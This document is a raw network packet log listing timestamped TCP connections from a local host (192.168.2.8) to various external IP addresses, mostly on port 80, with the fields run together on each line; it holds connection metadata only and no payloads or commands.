                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.835577965 CET805010247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.835633039 CET805010247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.908806086 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.943109035 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.943217993 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.948036909 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.948237896 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:13.096113920 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:13.299166918 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.303159952 CET805010247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.303349972 CET5010280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.308821917 CET805010247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.308917999 CET5010280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.323503017 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.328685999 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.329864979 CET5011080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.329901934 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.330039024 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.330050945 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.334806919 CET805011044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.334856987 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.334861994 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.334916115 CET5011080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.335072994 CET5011080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.335072994 CET5011080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.339890003 CET805011044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.339901924 CET805011044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.995487928 CET805011044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.995853901 CET5011080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.001785040 CET805011044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.001868010 CET5011080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.437371016 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.442289114 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.442384005 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.442550898 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.442651033 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.447447062 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.447458982 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.761959076 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.764678955 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.770104885 CET805010913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.770173073 CET5010980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.808535099 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813458920 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813534975 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813718081 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.813781977 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.818651915 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.818664074 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.299782038 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.306453943 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.311742067 CET805011634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.314076900 CET5011680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.498810053 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.533029079 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.535681963 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.555654049 CET5012280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.560611010 CET805012218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.661111116 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.666048050 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.666124105 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.668135881 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.668153048 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.672996998 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.673007965 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.025764942 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.030705929 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.030775070 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.031259060 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.031347036 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.035996914 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.036170006 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.304544926 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.305311918 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.309695959 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.310271978 CET804989185.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.311397076 CET4989180192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.311424971 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.327838898 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.335585117 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.340775013 CET805012744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.340841055 CET5012780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.418859959 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423732996 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423799038 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423952103 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.423960924 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.428904057 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.428915024 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.692012072 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.694314003 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.700067043 CET805012818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.701637030 CET5012880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.083570004 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.104129076 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.109644890 CET805013018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.109735012 CET5013080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.176409960 CET5013580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.181375027 CET805013547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.181880951 CET5013580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.182100058 CET5013580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.182204962 CET5013580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.186903954 CET805013547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.186986923 CET805013547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.321116924 CET5013880192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.326040030 CET80501383.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.329762936 CET5013880192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.329905987 CET5013880192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.329905987 CET5013880192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.334662914 CET80501383.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.334692955 CET80501383.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.301505089 CET80501383.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.309310913 CET5013880192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.314553976 CET80501383.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.316344023 CET5013880192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.542176008 CET5014480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.547092915 CET805014454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.547688961 CET5014480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.548094034 CET5014480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.548115015 CET5014480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.552910089 CET805014454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.552921057 CET805014454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.673985004 CET805013547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.683099031 CET5013580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.688277960 CET805013547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.689606905 CET5013580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.718971968 CET5014680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.723872900 CET805014618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.724056005 CET5014680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.724304914 CET5014680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.724354982 CET5014680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.729197025 CET805014618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.729568958 CET805014618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.382699966 CET805014454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.383158922 CET805014618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.385847092 CET5014480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.387029886 CET5014680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.391347885 CET805014454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.392111063 CET805014618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.392179012 CET5014480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.392200947 CET5014680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.416297913 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.421561003 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.421670914 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.422013044 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.422013044 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.427004099 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.427015066 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.533474922 CET5015280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.538494110 CET805015254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.538573027 CET5015280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.538760900 CET5015280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.538844109 CET5015280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.543637037 CET805015254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.543648958 CET805015254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.283830881 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467124939 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467175961 CET805015254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467191935 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467201948 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467255116 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467255116 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467322111 CET5015180192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467576027 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.467668056 CET5015280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.472408056 CET805015154.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.472887039 CET805015254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.472959042 CET5015280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.483191967 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.488126040 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.488192081 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.488413095 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.488452911 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.493314981 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.494431019 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.622242928 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627149105 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627244949 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627470016 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.627484083 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.632288933 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.632306099 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.733062029 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.736444950 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.741576910 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.323848963 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.324675083 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.330264091 CET805015718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.330372095 CET5015780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.349423885 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.354604006 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.354701042 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.355000019 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.355000019 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.359865904 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.360040903 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.462781906 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.463428974 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.468440056 CET805015818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.470597982 CET5015880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.627737045 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.632738113 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.641048908 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.646037102 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.646106958 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.646754026 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.647077084 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.651532888 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.652285099 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.898814917 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.900401115 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.905678034 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.342012882 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.342201948 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.347546101 CET805016318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.347606897 CET5016380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.453998089 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459033012 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459129095 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459331989 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.459362030 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.464190960 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.464202881 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.784372091 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.784528017 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.790499926 CET805016218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.790611029 CET5016280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.800642967 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.805639029 CET805016547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.805722952 CET5016580192.168.2.847.129.31.212
